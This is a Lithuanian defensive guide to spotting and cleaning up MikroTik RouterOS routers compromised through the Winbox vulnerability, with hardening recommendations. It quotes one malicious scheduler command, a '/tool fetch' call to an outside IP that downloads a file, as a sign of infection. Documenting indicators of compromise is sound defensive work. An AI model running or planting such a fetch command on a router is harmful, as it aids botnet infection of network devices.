Jau keletą mėnesių po viešai paskelbtos RouterOS Winbox saugumo spragos niekas neskubėjo atnaujinti RouterOS versijos. Visos RouterOS versijos nuo 6.29 iki 6.43rc3 yra pažeidžiamos. Gali būti, kad esate Winbox botnet automatinio įsilaužimo „auka”.
Įsilaužimo požymiai
Patikrinate pirmiausia „Files” skyriuje ar nėra nežinomo failo, kaip pavyzdys mikrotik.php. Jei radote, toliau tikriname ar yra sukurtas koks nors darbas skyriuje „Scheduler” ir galbūt nurodytas kodas, kuris turi suveikti. Taip pat patikriname skyriuje „Scripts”. Pavyzdys tokio kodo tipo gali būti toks:
/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http
Aptikote, vadinasi maršrutiozatorius yra nebesaugus ir reikia jį sutvarkyti.
### Priklausomai nuo kvalifikacijos ir turimų įgūdžių, galima stebėti ir gilintis, kiek giliai įsilaužėlis jau yra patekęs į vidinį tinklą. Tačiau tai daryti reikia labai atsakingai ir tik įvertinus visas rizikas ir įmonės duomenų saugos politikas. ###
Kamšome skylęs – apsauga
Sukuriame programinės įrangos atsargines kopijas – *.backup ir *.rsc failo formatu. Vėliau gali prireikti analizei, jei buvo modifikuota konfiguracija be jūsų.
Toliau atsisiunčiame RouterOS naujausią programinės įrangos versiją ir sudiegiame.
Atstatome visus nustatymus iš Jūsų turimos atsarginės kopijos. Jei jos kada buvo darytos. Jei ne – teks pradėti. Nes tokiu atveju kada neturite – reikės tikrinti visus konfiguracijos parametrus įvykus nesakcionuotam pakeitimui.
Pakeičiame admin ar FULL teises turinčių vartotojų slaptažodžius. Sugeneruojame naujus RSA sertificatus.
Išriname failus iš skyriaus „Files” su pavadinimu support.inf* ir kitus ne RouterOS sisteminius.
Toliau peržiūrime RouterOS nustatymus ir ypač Firewall taisykles. Ieškote to ko neturi buti.
### Turint seną gerą atsarginę kopija .rsc file galima padaryti diff su „nulaužto” maršrutizatoriaus atsargine kopija. Taip pamatytumėte skirtumus, jei jų yra. ###
Apsaugojus maršrutizatorių reikia toliau stebėti tinklo srautą ir ieškoti nestandartinių susijungimų su išore. Geriausia būtų bandyti paleisti tinkle IDS kaip pvz. Snort IDS.
Rekomendacijos
- Visada atnaujinkite įrangos programinę įranga!!!
- Ugniasienės taisyklėje nurodykite tik tą IP adresą, iš kurio bus jungiamasi su Winbox į maršrutizatorų. Jei tokios taisyklės neturite – sukurkite.
- System->Users ir pasirinktam vartotojui taip pat nurodykite „Allowed Address: IP adresą, iš kurio bus jungiamasi su Winbox į maršrutizatorų.
- Išjunkite Winbox servisą ir naudokite SSH protokolą, o autorizacijai ir autentifikacijai naudokite RSA sertifikatus. Apribokite priėjima taip pat ugniesienės taisyklės pagalba.
- Įjunkite įvykių žurnalo įrašus ungiasienės taisyklėms, kurias sukurėte Winbox ir SSH prisijungimui.
